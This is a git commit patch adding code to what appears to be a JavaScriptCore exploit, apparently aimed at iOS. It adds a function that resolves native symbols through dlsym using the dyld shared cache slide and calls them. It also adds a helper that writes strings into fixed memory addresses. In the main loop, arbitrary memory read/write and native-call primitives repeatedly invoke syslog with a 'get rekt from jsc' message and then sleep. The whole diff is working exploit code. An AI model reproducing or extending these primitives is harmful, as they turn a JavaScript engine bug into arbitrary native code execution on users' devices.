From d7cf3795b6da29a8ec7a6b7fc1245b70ff9d3dca Mon Sep 17 00:00:00 2001
From: spv <aquaticvegetable@gmail.com>
Date: Fri, 22 Apr 2022 15:57:02 -0400
Subject: stuff

---
 js/call.js | 11 +++++++++++
 js/main.js | 15 ++++++++++++---
 js/mem.js  |  8 ++++++++
 3 files changed, 31 insertions(+), 3 deletions(-)

(limited to 'js')

diff --git a/js/call.js b/js/call.js
index 382222c..8c5ad44 100644
--- a/js/call.js
+++ b/js/call.js
@@ -2,6 +2,7 @@ var reserve_addr = 0x1a0000;
 var gettimeofday_addy = 0x34d63d3c;
 var slide = 0x0;
 var base = 0x0;
+//var slid = 0x0;
 
 function get_dyld_shc_slide() {
 	return read_u32((slide << 12) + reserve_addr + 20);
@@ -45,3 +46,13 @@ function call4arg(addy, r0, r1, r2, r3) {
 	
 	return (parseInt(Int64.fromDouble(ret)) & 0xffffffff) >>> 0;
 }
+
+/*
+ *  call with symbol
+ */
+function calls4arg(sym, r0, r1, r2, r3) {
+	var dlsym_addy = read_u32(0x1a0000 + 24 + slid);
+	var shc_slide = read_u32(0x1a0000 + 20 + slid);
+	var addy = call4arg(dlsym_addy + shc_slide, 0xfffffffe, sptr(sym), 0, 0);
+	return call4arg(addy, r0, r1, r2, r3);
+}
diff --git a/js/main.js b/js/main.js
index efb1f5f..b75af4e 100644
--- a/js/main.js
+++ b/js/main.js
@@ -24,6 +24,10 @@ function main() {
 	slide = get_our_slide();
 	base = 0x4000 + (slide << 12);
 	slid = (slide << 12);
+//	write_u32(0x144444, slid);
+//	return;
+//	call(slide);
+//	while(true){;;};
 //	call(0x41424344);
 
 	log("slide=0x" + slide.toString(16));
@@ -31,6 +35,7 @@ function main() {
 	log("*(uint16_t*)base = 0x" + read_u16(base).toString(16));
 	log("*(uint32_t*)base = 0x" + read_u32(base).toString(16));
 
+
 	write_u32(0x144444, 0x69691337);
 
 	log("writing to first mapped loc");
@@ -49,7 +54,9 @@ function main() {
 
 	var dlsym_addy = read_u32(0x1a0000 + 24 + slid);
 	var shc_slide = read_u32(0x1a0000 + 20 + slid);
-	write_str(0x148000, "get rekt from jsc %d (slide=%x)\0");
+//	write_u32(0x144444, dlsym_addy);
+//	return;
+	write_str(0x148000, "get rekt from jsc %d (slide=%x)\n\0");
 	write_str(0x149000, "syslog\0");
 	write_str(0x14a000, "sleep\0");
 //	while (true) {
@@ -59,8 +66,10 @@ function main() {
 
 	var i = 0;
 	while (true) {
-		call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, slide);
-		call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x14a000, 0, 0), 1, 0x1, 0x2, 0x3);
+//		call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, slide);
+//		call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x14a000, 0, 0), 1, 0x1, 0x2, 0x3);
+		calls4arg("syslog\0", 0x28, sptr("get rekt from jsc %d (slide=%x)\n\0"), i, 0);
+		calls4arg("sleep", 1, 0, 0, 0);
 		i++;
 //		call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x148000, i, 0x2, 0x3);
 	}
diff --git a/js/mem.js b/js/mem.js
index c342707..cfa6698 100644
--- a/js/mem.js
+++ b/js/mem.js
@@ -145,3 +145,11 @@ function write_str(addy, s) {
 
 	return s;
 }
+
+var global_sptr_addy = 0x150000;
+
+function sptr(s) {
+	write_str(global_sptr_addy, s);
+	global_sptr_addy += s.length;
+	return global_sptr_addy - s.length;
+}
-- 
cgit v1.2.3